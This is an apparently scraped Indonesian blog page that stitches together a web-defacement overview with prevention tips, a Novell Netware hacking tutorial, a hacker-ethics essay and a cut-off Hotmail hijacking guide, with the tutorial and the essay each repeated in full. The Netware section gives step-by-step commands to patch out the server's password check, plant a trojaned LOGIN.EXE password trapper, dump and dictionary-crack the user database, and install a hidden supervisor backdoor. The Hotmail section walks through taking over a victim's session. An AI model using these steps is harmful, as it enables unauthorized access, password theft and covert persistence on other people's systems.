Published on http://batampos.co.id/content/view/31768/98/Beberapa minggu lalu, ketika masalah pemukulan warga negara Indonesia oleh polisi Malaysia, dunia internet Indonesia ramai oleh kelakuan para hacker merusak tampilan situs-situs yang berdomain Malaysia.
Juga beberapa bulan lalu ketika krisis Ambalat berlangsung, kedua kubu saling serang web deface.Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.
Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down. Untuk dapat melakukan web deface, defacer melakukan beberapa tahap sebagai berikut :
a. Mencari kelemahan pada sistem security, menemukan celah yang dapat dimasuki untuk melakukan eksplorasi di server target. Dia akan melakukan scanning tentang sistem operasi, service pack, service yang enable, port yang terbuka, dan lain sebagainya. Kemudian dianalisa celah mana yang bisa dimasuki.b. Melakukan penyusupan ke server korban. Teknik ini dia akan menggunakan beberapa tools, file yang akan disisipkan, file exploit yang dibuat sengaja untuk di-copy-kan. Setelah berhasil masuk , tangan-tangan defacer bisa mengobok-obok isi server.Tapi tidak adil kiranya jika hanya sharing tentang teknik deface web. Maka untuk pengelola situs harus waspada, karena deface bisa jadi bencana yang sangat merepotkan. Pekerjaan menata ulang dan memperbaiki bagian yang rusak, bukan pekerjaan yang mudah. Karena itu sebelum situs anda digerayangi seyogyanya melakukan langkah-langkah preventif sebagai berikut :1. Rutin melakukan update, upgrade dan patch pada sistem operasi dan aplikasi-aplikasi yang dipakai.2. Memeriksa ulang dan memperbaiki konfigurasi pada sistem operasi, web server dan aplikasi lainnya.3. Menganalisa kembali service-service yang aktif, matikan jika tidak perlu.4. Mengatur jadwal untuk melakukan backup data penting, file konfigurasi sistem, database, sehingga jika sewaktu-waktu terjadi deface, anda tinggal menggunakan data backup.5. Melindungi server dengan firewall dan IDS. Kedua tools ini ampuh untuk mengatasi serangan denial of service(DoS) attack.6. Selalu memperhatikan hal-hal yang mencurigakan pada server, baca log system operasi, log web server ataupun log aplikasi.7. Melakukan vulnerability scanning secara rutin, juga melakukan private security test.Demikian beberapa trik, baik melakukan deface (meskipun tak secara detail/teknis) maupun menangkal deface. Semoga website anda aman dari serangan para hacker
Posted in Security. Tags: attack, deface, hacker, Security, server, web.
Sabtu, 06 September 2008
Jumat, 05 September 2008
Hacking Novell Netware
Novell Netware, sebagai salah satu Network Operating System yang banyak
dipakai di Indonesia, merupakan OS yang menarik untuk dipelajari, karena
kedekatannya dengan DOS yang umumnya sudah dikenal pemakai komputer di
Indonesia.
Sayang sekali sebagai user biasa kita tidak bisa menggunakan feature-feature
tertentu yang hanya bisa di akses oleh SUPER USER (SUPERVISOR dalam istilah
Novell Netware).
Berikut ini beberapa trik yang bisa digunakan untuk mendapatkan akses
SUPERVISOR tersebut.
Catatan:
Tutorial ini dibuat untuk keperluan belajar dan penelitian Novell Netware,
bahkan beberapa trik yang digunakan disini sering digunakan oleh penulis
(CyberBug) pada saat melakukan Maintenance System Novell Netware.
Penulis dan Kecoak Elektronik tidak bertanggung jawab atas kesalahan
penggunaan tutorial ini.
Sebagai tambahan semua tutorial ini sudah diuji penulis di Novel Netware 3.11
dan 3.12
1. BAGAIMANA CARA SAYA MENDAPAT SUPERVISOR AKSES?
Ada beberapa kemungkinan yang mungkin anda punyai:
A. Anda punya akses fisik ke Server
B. Anda tidak punya akses fisik ke Server tapi punya account/login name
A. Anda punya akses fisik ke Server
Biasanya orang yang punya akses fisik ke Server (bisa menggunakan console
server) adalah orang yang dipercaya untuk Maintenance System.
Trik berikut ini biasanya saya lakukan kalau Supervisornya tidak berada
ditempat saat kita memerlukan passwordnya atau Supervisornya lupa passwordnya
(jangan tertawa, banyak yang begini, karena akses Supervisor kadang dipakai
sampai mereka lupa sendiri).
Berikut hacknya:
Cat: Yg didalam [ ] adalah tombol keyboard yg harus ditekan.
Yg didalam { } adalah keterangan
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: d VerifyPassword 6 [Enter] {Catat 6 byte yg keluar sebagai hasilnya}.
3. Ketik: c VerifyPassword=B8 0 0 0 0 C3 [Enter] {Matikan cek password}
4. Ketik: g [Enter] {Lakukan perubahan}
Sesudah proses ini dilakukan anda dapat login sebagai Supervisor tanpa perlu
mengisi password.
Untuk mengembalikan cek password:
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: c VerifyPassword=xx xx xx xx xx xx [Enter] {xx=6 bytes yg dicatat}
3. Ketik: g [Enter] {Lakukan perubahan}
Atau kalau mau mudahnya (dan dimungkinkan) down servernya kemudian restart
lagi, password check akan normal kembali, karena perubahan password check
cuma di memory.
B. Anda tidak punya akses fisik ke Server tapi punya account/login name
(meskipun hanya guest account).
Cara yang paling mudah adalah menggunakan program NW-HACK.EXE, kerja
program ini sebagai berikut:
1. Jika SUPERVISOR sudah login (cek dgn USERLIST) jalankan program ini.
Password Supervisor akan diubah menjadi SUPER_HACKER (Cool name eh?)
2. Dan setiap account dalam server tersebut akan menjadi SUPERVISOR Equivalent
yang berarti semua user setara dengan SUPERVISOR.
3. Kita harus memasang BACKDOOR sesudah mendapatkan akses seperti ini (karena
kalau Supervisornya tahu, pasti dia akan mengubah status semua user yang
sudah jadi Supervisor Equivalent ke status normal).
2. BAGAIMANA MENDAPATKAN PASSWORD LAIN DI NOVELL NETWARE?
Password Trapper terbaik yang pernah saya kenal adalah dua sekawan LOGIN.EXE
(hasil patch dari Hacker Belanda bernama itsme) dan PROP.EXE
Untuk bisa menanam Password Trapper ini
1. Kita harus mendapat SUPERVISOR akses dulu,
2. Kalau supervisor akses sudah didapat, ganti file LOGIN.EXE di directory
SYS:LOGIN dengan file LOGIN.EXE hasil patch, jangan lupa mengganti
flag/attributnya menjadi SRO.
3. Sesudah file LOGIN.EXE diganti, masih sebagai Supervisor jalankan file
PROP.EXE dengan option -C [PROP -C] untuk membuat bindery property baru
(sebagai tempat password yang di trap).
4. Sesudah satu minggu atau satu bulan kemudian coba cek password panenan
kamu dengan perintah PROP -R atau boleh juga di pipe seperti
PROP -R > NAMAFILE.
5. Untuk menjalankan PROP.EXE kita tidak perlu akses Supervisor, cukup user
biasa saja, bahkan tidak perlu login sama sekali yang penting IPX dan
NETX (atau LSL, IPXODI dan VLM, whatever) sudah dijalankan (saran saya
siapkan PROP.EXE di disket kemudian jalankan dari disket).
4. BAGAIMANA MENDAPATKAN SEMUA PASSWORD DI NOVELL NETWARE?
1. Sebagai SUPERVISOR masuk ke directory SYS:SYSTEM, kemudian ketik BINDFIX.
2. Jawab semua pertanyaan dengan Yes, kalau sudah selesai,
3. Copy 3 (tiga) file berextension .OLD (cari tahu sendiri filenya) ke disket.
4. Gunakan program BINDERY.EXE sebagai berikut:
BINDERY ETC > PASSWORD
5. Kemudian crack hasil di file PASSWORD menggunakan BINCRACK.EXE plus
FILEDICTIONARY (kumpulan password) sebagai berikut :
BINCRACK PASSWORD FILEDICTIONARY > HASILPASS
5. BAGAIMANA MEMBUAT BACKDOOR?
Ada satu file bernama SUPER.EXE yang sering dipakai untuk keperluan ini,
dengan file ini kita bisa mendapatkan Supervisor Equivalent (dengan
menggunakan login user biasa) kapan saja kita inginkan.
Tapi ini harus diset lebih dahulu, dan untuk bisa setting backdoor ini, kita
harus mendapatkan akses Supervisor dulu (utility ini memang untuk Supervisor,
supaya sang Supervisor bisa mengganti status nya sebagai user biasa atau
supervisor sesuai kebutuhan).
Misalnya anda punya login dengan nama KECOAK, dan anda ingin anda bisa
mengganti status anda sebagai normal user ataupun supervisor kapan saja anda
suka.
1. Login sebagai Supervisor
2. Jalankan program SYSCON
3. Set equivalent user KECOAK sebagai SUPERVISOR
4. Tutup/Exit program SYSCON
5. Login sebagai KECOAK
6. Jalankan program SUPER.EXE sebagai berikut: SUPER +
Sekarang Toggle Supervisor Equivalent untuk KECOAK sudah ON
7. Login sebagai SUPERVISOR
8. Jalankan program SYSCON
9. Hapus equivalent SUPERVISOR user KECOAK
10. Tutup/Exit program SYSCON
11. Untuk selanjutnya untuk mengaktifkan Supervisor Equivalent, anda tinggal
login sebagai KECOAK kemudian mengetik SUPER +, untuk menonaktifkan
Supervisor Equivalent ketiklah: SUPER -
(Heheheheh ... Ksatria Kecoak Baja Hitam - Berubah!!!)
6. DARIMANA SAJA SAYA BISA MENDAPAT SEMUA UTILITY YANG DISEBUT DIATAS?
Internet Search Engine adalah sumber yang hampir tidak terbatas, ketik
NAMAFILE yang anda inginkan dan anda akan mendapatkannya.
Beberapa search engine yang baik adalah:
http://www.altavista.digital.com
http://www.excite.com
Dan yang terbaik untuk hacker:
http://astalavista.box.sk
7. PENUTUP
Tutorial ini lebih merupakan kutipan dari "The Unofficial Netware Hack FAQ",
karya Simple Nomad dari Nomad Mobile Research Centre, penulis hanya mengutip
bagian-bagian yang diketahui dan sudah diuji oleh penulis sendiri dan
diharapkan juga berguna untuk dunia sekuritas di Indonesia.
Referensi :
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
dipakai di Indonesia, merupakan OS yang menarik untuk dipelajari, karena
kedekatannya dengan DOS yang umumnya sudah dikenal pemakai komputer di
Indonesia.
Sayang sekali sebagai user biasa kita tidak bisa menggunakan feature-feature
tertentu yang hanya bisa di akses oleh SUPER USER (SUPERVISOR dalam istilah
Novell Netware).
Berikut ini beberapa trik yang bisa digunakan untuk mendapatkan akses
SUPERVISOR tersebut.
Catatan:
Tutorial ini dibuat untuk keperluan belajar dan penelitian Novell Netware,
bahkan beberapa trik yang digunakan disini sering digunakan oleh penulis
(CyberBug) pada saat melakukan Maintenance System Novell Netware.
Penulis dan Kecoak Elektronik tidak bertanggung jawab atas kesalahan
penggunaan tutorial ini.
Sebagai tambahan semua tutorial ini sudah diuji penulis di Novel Netware 3.11
dan 3.12
1. BAGAIMANA CARA SAYA MENDAPAT SUPERVISOR AKSES?
Ada beberapa kemungkinan yang mungkin anda punyai:
A. Anda punya akses fisik ke Server
B. Anda tidak punya akses fisik ke Server tapi punya account/login name
A. Anda punya akses fisik ke Server
Biasanya orang yang punya akses fisik ke Server (bisa menggunakan console
server) adalah orang yang dipercaya untuk Maintenance System.
Trik berikut ini biasanya saya lakukan kalau Supervisornya tidak berada
ditempat saat kita memerlukan passwordnya atau Supervisornya lupa passwordnya
(jangan tertawa, banyak yang begini, karena akses Supervisor kadang dipakai
sampai mereka lupa sendiri).
Berikut hacknya:
Cat: Yg didalam [ ] adalah tombol keyboard yg harus ditekan.
Yg didalam { } adalah keterangan
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: d VerifyPassword 6 [Enter] {Catat 6 byte yg keluar sebagai hasilnya}.
3. Ketik: c VerifyPassword=B8 0 0 0 0 C3 [Enter] {Matikan cek password}
4. Ketik: g [Enter] {Lakukan perubahan}
Sesudah proses ini dilakukan anda dapat login sebagai Supervisor tanpa perlu
mengisi password.
Untuk mengembalikan cek password:
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: c VerifyPassword=xx xx xx xx xx xx [Enter] {xx=6 bytes yg dicatat}
3. Ketik: g [Enter] {Lakukan perubahan}
Atau kalau mau mudahnya (dan dimungkinkan) down servernya kemudian restart
lagi, password check akan normal kembali, karena perubahan password check
cuma di memory.
B. Anda tidak punya akses fisik ke Server tapi punya account/login name
(meskipun hanya guest account).
Cara yang paling mudah adalah menggunakan program NW-HACK.EXE, kerja
program ini sebagai berikut:
1. Jika SUPERVISOR sudah login (cek dgn USERLIST) jalankan program ini.
Password Supervisor akan diubah menjadi SUPER_HACKER (Cool name eh?)
2. Dan setiap account dalam server tersebut akan menjadi SUPERVISOR Equivalent
yang berarti semua user setara dengan SUPERVISOR.
3. Kita harus memasang BACKDOOR sesudah mendapatkan akses seperti ini (karena
kalau Supervisornya tahu, pasti dia akan mengubah status semua user yang
sudah jadi Supervisor Equivalent ke status normal).
2. BAGAIMANA MENDAPATKAN PASSWORD LAIN DI NOVELL NETWARE?
Password Trapper terbaik yang pernah saya kenal adalah dua sekawan LOGIN.EXE
(hasil patch dari Hacker Belanda bernama itsme) dan PROP.EXE
Untuk bisa menanam Password Trapper ini
1. Kita harus mendapat SUPERVISOR akses dulu,
2. Kalau supervisor akses sudah didapat, ganti file LOGIN.EXE di directory
SYS:LOGIN dengan file LOGIN.EXE hasil patch, jangan lupa mengganti
flag/attributnya menjadi SRO.
3. Sesudah file LOGIN.EXE diganti, masih sebagai Supervisor jalankan file
PROP.EXE dengan option -C [PROP -C] untuk membuat bindery property baru
(sebagai tempat password yang di trap).
4. Sesudah satu minggu atau satu bulan kemudian coba cek password panenan
kamu dengan perintah PROP -R atau boleh juga di pipe seperti
PROP -R > NAMAFILE.
5. Untuk menjalankan PROP.EXE kita tidak perlu akses Supervisor, cukup user
biasa saja, bahkan tidak perlu login sama sekali yang penting IPX dan
NETX (atau LSL, IPXODI dan VLM, whatever) sudah dijalankan (saran saya
siapkan PROP.EXE di disket kemudian jalankan dari disket).
4. BAGAIMANA MENDAPATKAN SEMUA PASSWORD DI NOVELL NETWARE?
1. Sebagai SUPERVISOR masuk ke directory SYS:SYSTEM, kemudian ketik BINDFIX.
2. Jawab semua pertanyaan dengan Yes, kalau sudah selesai,
3. Copy 3 (tiga) file berextension .OLD (cari tahu sendiri filenya) ke disket.
4. Gunakan program BINDERY.EXE sebagai berikut:
BINDERY ETC > PASSWORD
5. Kemudian crack hasil di file PASSWORD menggunakan BINCRACK.EXE plus
FILEDICTIONARY (kumpulan password) sebagai berikut :
BINCRACK PASSWORD FILEDICTIONARY > HASILPASS
5. BAGAIMANA MEMBUAT BACKDOOR?
Ada satu file bernama SUPER.EXE yang sering dipakai untuk keperluan ini,
dengan file ini kita bisa mendapatkan Supervisor Equivalent (dengan
menggunakan login user biasa) kapan saja kita inginkan.
Tapi ini harus diset lebih dahulu, dan untuk bisa setting backdoor ini, kita
harus mendapatkan akses Supervisor dulu (utility ini memang untuk Supervisor,
supaya sang Supervisor bisa mengganti status nya sebagai user biasa atau
supervisor sesuai kebutuhan).
Misalnya anda punya login dengan nama KECOAK, dan anda ingin anda bisa
mengganti status anda sebagai normal user ataupun supervisor kapan saja anda
suka.
1. Login sebagai Supervisor
2. Jalankan program SYSCON
3. Set equivalent user KECOAK sebagai SUPERVISOR
4. Tutup/Exit program SYSCON
5. Login sebagai KECOAK
6. Jalankan program SUPER.EXE sebagai berikut: SUPER +
Sekarang Toggle Supervisor Equivalent untuk KECOAK sudah ON
7. Login sebagai SUPERVISOR
8. Jalankan program SYSCON
9. Hapus equivalent SUPERVISOR user KECOAK
10. Tutup/Exit program SYSCON
11. Untuk selanjutnya untuk mengaktifkan Supervisor Equivalent, anda tinggal
login sebagai KECOAK kemudian mengetik SUPER +, untuk menonaktifkan
Supervisor Equivalent ketiklah: SUPER -
(Heheheheh ... Ksatria Kecoak Baja Hitam - Berubah!!!)
6. DARIMANA SAJA SAYA BISA MENDAPAT SEMUA UTILITY YANG DISEBUT DIATAS?
Internet Search Engine adalah sumber yang hampir tidak terbatas, ketik
NAMAFILE yang anda inginkan dan anda akan mendapatkannya.
Beberapa search engine yang baik adalah:
http://www.altavista.digital.com
http://www.excite.com
Dan yang terbaik untuk hacker:
http://astalavista.box.sk
7. PENUTUP
Tutorial ini lebih merupakan kutipan dari "The Unofficial Netware Hack FAQ",
karya Simple Nomad dari Nomad Mobile Research Centre, penulis hanya mengutip
bagian-bagian yang diketahui dan sudah diuji oleh penulis sendiri dan
diharapkan juga berguna untuk dunia sekuritas di Indonesia.
Referensi :
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
Tuturial Lamer
Hacking -> Profit vs (non)Profit
Oleh: scut (Kecoak Elektronik)
[Intro]:
"Wah, enak yach menjadi seorang hacker proffesional, bisa kerja di security consultant,
bisa tenar dan banyak ngisi beberapa seminar tentang security, dan tentunya gajinya
dihitung dengan dollar".
Ucapan seperti itu mungkin (dan bisa jadi bukan hanya mungkin) sangat ngetrend untuk
beberapa waktu terakhir ini, seiring dengan banyaknya event-event yang mengupas tentang
security (including: hacking and security applications) yang marak diadakan di Indonesia.
Salahkah penyataan seperti diatas? yang menggambarkan bahwa seorang hacker akan mendapat
kan banyak keuntungan dari ilmu yang dia dapatkan?
Jawaban yang paling simple untuk memberikan gambaran terhadap `kamuflase' yang sengaja
di-euphoriakan oleh kelompok `whitehats hacker' adalah bahwa untuk keamanan sistem operasi
dan network membutuhkan biaya yang tidak sedikit (untuk membayar IT engineer). Kita kembali
kedalam konsep lama yang menjadi sebuah kode etik standard hacker bahwasannya ada beberapa
point yang perlu kita cermati disini:
(1) Hacking adalah sebuah aktifitas untuk membangun dengan didasari keinginan untuk
berkembang lebih baik dari apa yang dia ketahui (untuk saat ini).
(2) Jangan pernah sesekali untuk menjual (ilmu pengetahuan) tentang komputer yang anda
dapatkan secara gratis di internet hanya untuk kepentingan pribadi atau untuk
kepentingan industri keamanan komputer.
(3) Hacking (hacking fundamental) adalah sebuah kegiatan yang bersifat independent (dalam
hal ini tidak berpihak kepada pemerintahan, perusahaan sekuriti, dan juga pihak yang
sengaja memanfaatkan kemampuan seseorang dalam bisa komputer untuk dibayar).
(4) Hacking adalah sebuah kemampuan berpikir dan menganalisa sebuah masalah dengan logika
yang tepat, disini dibutuhkan sebuah tempat (komunitas) untuk melakukan testing,
proving, researching, searching, questioning, designing, brainstorming etc. Semakin
kompleks sebuah permasalahan, diskusi akan membawa kita (komunitas) untuk survive
dalam menghadapi segala tantangan yang ada.
Kutipan dari pengertian hacking (diambil dari Chaos Computer Club 1999):
"Hacking is about thinking for yourself. Hacking needs a place for meeting, discussing,
testing, proving, questioning, designing, redesigning, engineering, reengineering,
searching, researching, hacking, phreaking, brainstorming and understanding.
As our world is getting more and more complex, gaining and sharing knowledge is key
to survival. There is a need for open communication and a free, unlimited exchange
of ideas and concepts".
Dengan mengacu kepada pengertian umum diatas bahwasannya untuk waktu sekarang ini, kegiatan
kamuflase yang dilakukan oleh kelompok `whitehats hacker' jelas adalah sebuah pembodohan
publik. Dimana (khususnya di Indonesia) seringkali pengertian tentang dua kelompok besar
hacker ini (blackhats vs whitehats) disalah artikan dengan seorang whitehats adalah hacker
yang baik, yang selalu membangun dan tidak merusak. Dan kelompok blackhats adalah kelompok
hacker yang suka merusak dan merugikan.
Hal ini sangat berbalik 180 derajad dengan kenyataan yang terjadi sebenarnya adalah seringkali
kelompok-kelompok whitehats hacker yang bernaung dibawah bendera security industry hanya
memanfaatkan kemampuan yang diperoleh dari kelompok blackhats hacker yang kemudian mereka
melakukan testing dan riset dan akhirnya mereka menjual ide dan konsep (yang datangnya bukan
dari mereka sendiri) untuk dijual kepada perusahaan security.
Kalau kita lihat dari manifesto hacker (The Mentor) bahwa seorang hacker adalah `seorang
kriminal' yang haus dengan ilmu pengetahuan, mereka menyusup hanya demi sebuah ilmu
pengetahuan. Tidak ada dalam manifesto diatas bahwasannya seorang hacker melakukan riset
dan pengembangan demi sebuah bayaran (uang).
Semakin jelas disini, kalau kita tidak bisa memilah beberapa informasi yang masuk kedalam
pikiran kita (tentang hacking) akan menjadi sebuah kesalahan bahwa seorang hacker professional
adalah yang selalu bekerja untuk perusahaan keamanan komputer, dan yang selalu mengisi berba
gai seminar-seminar sekuriti dan akhirnya mendapatkan keuntungan.
Perhatikan perkataan dari seorang IT engineer berikut ini:
"If you do this for fun, then stop calling yourself a professional !!"
Apa maksud dibalik perkataan tersebut? Saya mengartikannya dengan:
"jika anda melakukan hacking hanya untuk fun (disini diartikan fun, adalah non-provit,
independet, enjoy etc), jangan menyebut diri anda adalah seorang yang professional".
Prefessional seperti apa yang dikatakan diatas ada dua pengertian (rancu), yang pertama adalah
bahwa professional diukur dari segi skill dan teknik, adapun yang kedua (semoga tidak seperti
ini apa yang dimaksudkan) adalah professional diukur dari besarnya fee (upah).
Didalam kultur hacker itu sendiri "The Classical Hacker" tertulis bahwa tujuan hacker adalah
bukan desdruktif, bukan komersil, bukan pula sebuah ketenaran. Hacker adalah sekumpulan
atau beberapa kelompok yang bertujuan untuk mengembangkan ilmu pengengetahuan dan sharing
informasi bebas tanpa batas. Hacker tidak pernah terlibat masalah jual beli teknik dan code
untuk memperkaya diri sendiri (karena hacker bukanlah seorang makelar!).
Sebagai penutup dari tulisan singkat disini adalah:
(1) Kenali musuhmu (internal dan eksternal), artinya kenali siapa-siapa yang benar
benar merugikan untuk perkembangan ilmu pengetahuan, yang selalu menjual ilmunya
(yang diperoleh secara gratis) hanya untuk kepentingan pribadi.
(2) Bersikaplah independent, dalam artian jangan sesekali anda (hacker) untuk bekerja
dengan pemerintah sebagai seorang spionase, atau untuk perusahaan sekuriti, hal ini
akan menyebabkan hilangnya idealisme anda untuk selalu bersikap dan mengembangkan
ilmu pengetahuan untuk kemudian dikembangkan secara gratis.
(3) Pahami bahwa apa yang kalian pahami selama ini tentang dua kelompok hacker (whitehats
dan blackhats) tidaklah seperti apa yang terjadi selama ini. Whitehats bukanlah seorang
hacker yang baik, dan blackhats bukanlah seorang hacker yang jahat (Ini adalah sebuah
pernyataan yang konyol).
Mungkin tulisan diatas terlalu arrogan dan `kacau'. Namun hanya untuk menjawab segala
pertanyaan dan fakta yang terjadi. Tulisan diatas setidaknya mampu untuk mengkritisi terhadap
kesalah pahaman tentang pemahaman hacker sebagai sesuatu yang dikomersialkan. Atau setidaknya
bisa menjadi sebuah sindiran?
Harapan saya cuma satu, semoga menjadi sebuah wacana yang mendidik.
Ciao.
scut
Referensi :
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
Oleh: scut (Kecoak Elektronik)
[Intro]:
"Wah, enak yach menjadi seorang hacker proffesional, bisa kerja di security consultant,
bisa tenar dan banyak ngisi beberapa seminar tentang security, dan tentunya gajinya
dihitung dengan dollar".
Ucapan seperti itu mungkin (dan bisa jadi bukan hanya mungkin) sangat ngetrend untuk
beberapa waktu terakhir ini, seiring dengan banyaknya event-event yang mengupas tentang
security (including: hacking and security applications) yang marak diadakan di Indonesia.
Salahkah penyataan seperti diatas? yang menggambarkan bahwa seorang hacker akan mendapat
kan banyak keuntungan dari ilmu yang dia dapatkan?
Jawaban yang paling simple untuk memberikan gambaran terhadap `kamuflase' yang sengaja
di-euphoriakan oleh kelompok `whitehats hacker' adalah bahwa untuk keamanan sistem operasi
dan network membutuhkan biaya yang tidak sedikit (untuk membayar IT engineer). Kita kembali
kedalam konsep lama yang menjadi sebuah kode etik standard hacker bahwasannya ada beberapa
point yang perlu kita cermati disini:
(1) Hacking adalah sebuah aktifitas untuk membangun dengan didasari keinginan untuk
berkembang lebih baik dari apa yang dia ketahui (untuk saat ini).
(2) Jangan pernah sesekali untuk menjual (ilmu pengetahuan) tentang komputer yang anda
dapatkan secara gratis di internet hanya untuk kepentingan pribadi atau untuk
kepentingan industri keamanan komputer.
(3) Hacking (hacking fundamental) adalah sebuah kegiatan yang bersifat independent (dalam
hal ini tidak berpihak kepada pemerintahan, perusahaan sekuriti, dan juga pihak yang
sengaja memanfaatkan kemampuan seseorang dalam bisa komputer untuk dibayar).
(4) Hacking adalah sebuah kemampuan berpikir dan menganalisa sebuah masalah dengan logika
yang tepat, disini dibutuhkan sebuah tempat (komunitas) untuk melakukan testing,
proving, researching, searching, questioning, designing, brainstorming etc. Semakin
kompleks sebuah permasalahan, diskusi akan membawa kita (komunitas) untuk survive
dalam menghadapi segala tantangan yang ada.
Kutipan dari pengertian hacking (diambil dari Chaos Computer Club 1999):
"Hacking is about thinking for yourself. Hacking needs a place for meeting, discussing,
testing, proving, questioning, designing, redesigning, engineering, reengineering,
searching, researching, hacking, phreaking, brainstorming and understanding.
As our world is getting more and more complex, gaining and sharing knowledge is key
to survival. There is a need for open communication and a free, unlimited exchange
of ideas and concepts".
Dengan mengacu kepada pengertian umum diatas bahwasannya untuk waktu sekarang ini, kegiatan
kamuflase yang dilakukan oleh kelompok `whitehats hacker' jelas adalah sebuah pembodohan
publik. Dimana (khususnya di Indonesia) seringkali pengertian tentang dua kelompok besar
hacker ini (blackhats vs whitehats) disalah artikan dengan seorang whitehats adalah hacker
yang baik, yang selalu membangun dan tidak merusak. Dan kelompok blackhats adalah kelompok
hacker yang suka merusak dan merugikan.
Hal ini sangat berbalik 180 derajad dengan kenyataan yang terjadi sebenarnya adalah seringkali
kelompok-kelompok whitehats hacker yang bernaung dibawah bendera security industry hanya
memanfaatkan kemampuan yang diperoleh dari kelompok blackhats hacker yang kemudian mereka
melakukan testing dan riset dan akhirnya mereka menjual ide dan konsep (yang datangnya bukan
dari mereka sendiri) untuk dijual kepada perusahaan security.
Kalau kita lihat dari manifesto hacker (The Mentor) bahwa seorang hacker adalah `seorang
kriminal' yang haus dengan ilmu pengetahuan, mereka menyusup hanya demi sebuah ilmu
pengetahuan. Tidak ada dalam manifesto diatas bahwasannya seorang hacker melakukan riset
dan pengembangan demi sebuah bayaran (uang).
Semakin jelas disini, kalau kita tidak bisa memilah beberapa informasi yang masuk kedalam
pikiran kita (tentang hacking) akan menjadi sebuah kesalahan bahwa seorang hacker professional
adalah yang selalu bekerja untuk perusahaan keamanan komputer, dan yang selalu mengisi berba
gai seminar-seminar sekuriti dan akhirnya mendapatkan keuntungan.
Perhatikan perkataan dari seorang IT engineer berikut ini:
"If you do this for fun, then stop calling yourself a professional !!"
Apa maksud dibalik perkataan tersebut? Saya mengartikannya dengan:
"jika anda melakukan hacking hanya untuk fun (disini diartikan fun, adalah non-provit,
independet, enjoy etc), jangan menyebut diri anda adalah seorang yang professional".
Prefessional seperti apa yang dikatakan diatas ada dua pengertian (rancu), yang pertama adalah
bahwa professional diukur dari segi skill dan teknik, adapun yang kedua (semoga tidak seperti
ini apa yang dimaksudkan) adalah professional diukur dari besarnya fee (upah).
Didalam kultur hacker itu sendiri "The Classical Hacker" tertulis bahwa tujuan hacker adalah
bukan desdruktif, bukan komersil, bukan pula sebuah ketenaran. Hacker adalah sekumpulan
atau beberapa kelompok yang bertujuan untuk mengembangkan ilmu pengengetahuan dan sharing
informasi bebas tanpa batas. Hacker tidak pernah terlibat masalah jual beli teknik dan code
untuk memperkaya diri sendiri (karena hacker bukanlah seorang makelar!).
Sebagai penutup dari tulisan singkat disini adalah:
(1) Kenali musuhmu (internal dan eksternal), artinya kenali siapa-siapa yang benar
benar merugikan untuk perkembangan ilmu pengetahuan, yang selalu menjual ilmunya
(yang diperoleh secara gratis) hanya untuk kepentingan pribadi.
(2) Bersikaplah independent, dalam artian jangan sesekali anda (hacker) untuk bekerja
dengan pemerintah sebagai seorang spionase, atau untuk perusahaan sekuriti, hal ini
akan menyebabkan hilangnya idealisme anda untuk selalu bersikap dan mengembangkan
ilmu pengetahuan untuk kemudian dikembangkan secara gratis.
(3) Pahami bahwa apa yang kalian pahami selama ini tentang dua kelompok hacker (whitehats
dan blackhats) tidaklah seperti apa yang terjadi selama ini. Whitehats bukanlah seorang
hacker yang baik, dan blackhats bukanlah seorang hacker yang jahat (Ini adalah sebuah
pernyataan yang konyol).
Mungkin tulisan diatas terlalu arrogan dan `kacau'. Namun hanya untuk menjawab segala
pertanyaan dan fakta yang terjadi. Tulisan diatas setidaknya mampu untuk mengkritisi terhadap
kesalah pahaman tentang pemahaman hacker sebagai sesuatu yang dikomersialkan. Atau setidaknya
bisa menjadi sebuah sindiran?
Harapan saya cuma satu, semoga menjadi sebuah wacana yang mendidik.
Ciao.
scut
Referensi :
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
exploit for newbie (pemula)
hacking hotmail
Tulisan ini dibuat untuk para pemula, dan mereka lainnya yang selalu
pengen belajar. Ini nih mah gak buat yang udah pengalaman yang udah tau.
Kecuali emang lagi pengen baca. =-)
Artikel ini berisi informasi mengenai Hotmail free internet based e-mail dan
bagaiman untuk mendapatkan access ke semua account lainnya (Yah ... tidak
semua sih =-P ).
==================
==Latar Belakang==
==================
Hotmail adalah sebuah i-mil system berbasis web. Yang cgi-bin sebagai
sebuah gateway ke mesin-mesin lokal dimana semua password dan e-mail
di simpan.
Hotmail akan meminta kamu masukin login pada satu page dan password pada
page lainnya, Nah ini yang jadi kunci pertama dari metode buat nge'hack.
Ketika ada dalam account Hotmail, ada banyak pilihan, kayak reading mail,
deleting mail, dll
Nah pilihan terakhir adalah logout option, yang merupakan kunci kedua dari
metode nembus-in. Untuk itu kamu mesti tau user name dari subject/victim.
User name ini mah nama diawal tanda @ di alamat i-mil mereka, so
mudah aja didapat. Kamu juga musti make browser yang bisa nampilin source
code dari page yang sedang kamu liat. Yup, cuman itu yang dibutuhkan selain
subject nya mesti bloon bener, entah lupa pa gak peduli buat logout
sekali mereka udah masuk dalam system. Nah ini nih kunci buat
nge'hacknya!!!!!!
Pokoke gimana caranya supaya si-subject gak logout, terserah =-)
===========
==Caranye==
===========
Sekarang langkah-langkah buat nge-hacknya ......
//////////
langkah 1
/////////
Langkah pertama adalah untuk mendapatkan username dari 'subject'
trus buka web browser ke http://www.hotmail.com dan login dengan user name
itu.
Pasti-in kalo kamu udah bener nulis username soalnye hotmail gak bakalan
ngasih tauk kalo kamu ngisinya gak bener, Hotmail akan me-log IP dari orang
yang memasukkan nama login yang salah.
//////////
Langkah 2
/////////
Sekarang liat source code dari password page yang kamu masukin. Pada URL box
browser kamu bakalan keliatan seperti ini ->
www.hotmail.com/cgi-bin/password.cgi
Liat source codenya. Cari yang pada souce code page tersebut, yang kayak ini :
